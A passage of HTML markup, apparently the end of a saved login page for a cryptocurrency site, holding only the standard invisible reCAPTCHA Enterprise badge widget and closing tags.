	</div></div><div><div data-style="bottomright" style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;"><div class="grecaptcha-logo"><iframe title="reCAPTCHA" src="https://www.google.com/recaptcha/enterprise/anchor?ar=1&amp;k=6LcxysYaAAAAAOf5QgMWz-GXzoXjpvSrSXETmtlU&amp;co=aHR0cHM6Ly9sb2dpbi5ibG9ja2NoYWluLmNvbTo0NDM.&amp;hl=en&amp;v=VZKEDW9wslPbEc9RmzMqaOAP&amp;size=invisible&amp;cb=ax8h2arkinef" width="256" height="60" role="presentation" name="a-ft0d193pvcz4" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"></iframe></div><div class="grecaptcha-error"></div><textarea id="g-recaptcha-response-100000" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div></div></body></html>